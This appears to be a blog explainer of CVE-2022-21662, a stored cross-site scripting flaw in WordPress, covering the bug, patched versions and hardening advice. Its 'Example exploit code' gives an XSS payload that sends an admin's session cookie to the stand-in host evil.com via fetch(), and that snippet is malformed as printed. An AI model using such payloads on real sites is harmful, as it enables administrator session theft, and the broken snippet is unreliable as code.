WordPress is one of the most popular website platforms in the world. It powers over 40% of all websites! That’s a lot of blogs, online stores, and news sites depending on this free software, which is built using PHP and uses a MariaDB or MySQL database. But, what happens if a security problem lets even regular users attack site administrators? That’s the story behind CVE-2022-21662. Here’s what you need to know — with very simple explanations and some technical details.

What is CVE-2022-21662?

CVE-2022-21662 is a vulnerability discovered in the WordPress core software. This bug lets any authenticated user — like someone with an “author” account (not just admins!) — inject malicious JavaScript into the site content. This attack is called stored XSS (Cross-Site Scripting). It’s bad because when a high-privileged user (like an admin) visits the page, their session can be hijacked or their browser can be made to send sensitive info to the attacker.

How Does the Exploit Work?

This vulnerability is tied to post content. It was discovered that WordPress did not properly sanitize input from lower-privileged users before saving it in database, which could be viewed by admins.

In short: If you’re a regular author on a WordPress site, you could save a post with malicious JavaScript code hidden in the content. When an admin later edits the post or previews it in the dashboard, the code will run in their browser — possibly giving the attacker admin control.

Technical Walkthrough

Let’s see an example. Suppose a WordPress author writes a blog post and puts this special payload inside:

<img src="x" onerror="alert(document.domain)">

Normally, WordPress tries to filter out dangerous tags. But because of the CVE-2022-21662 bug, some combinations could sneak through the filters in older versions.

Wait for an admin: The attack triggers when an administrator views or previews the post.

Instead of a pop-up (alert) like in our simple example, a real attacker might try to steal cookies, change admin settings, or create a new admin account.

Example exploit code

<img src="x" onerror="fetch('https://evil.com/steal?cookie='; + document.cookie)">

This code sends the admin’s session cookie to evil.com.

How Do You Fix This?

Update WordPress! This issue is fully patched in version 5.8.3 (released January 2022). WordPress also released security updates for every affected branch, all the way back to 3.7.37.

If you maintain many sites, update all of them right away.

There are no known workarounds. You cannot “disable” this feature or block it with just a plugin or firewall. The only real fix is to upgrade.

References

- WordPress Security Release 5.8.3
- Automattic Security Advisory
- NVD Entry for CVE-2022-21662

Enable automatic updates.

- Remove author/contributor accounts that aren’t needed.
- Remind your users not to trust posts saved by anyone with “author” or similar low-level access in old versions.

Final Thoughts

CVE-2022-21662 is a classic “small actions, big consequences” bug — don’t underestimate low-privilege user accounts! If your WordPress site is still on an old version, you’re inviting trouble. Update your WordPress installation today and stay secure.


Stay safe and keep your blog (and your readers!) secure. If you want more details or help, check out the official security advisories linked above.

Timeline

Published on: 01/06/2022 23:15:00 UTC
Last modified on: 04/12/2022 18:48:00 UTC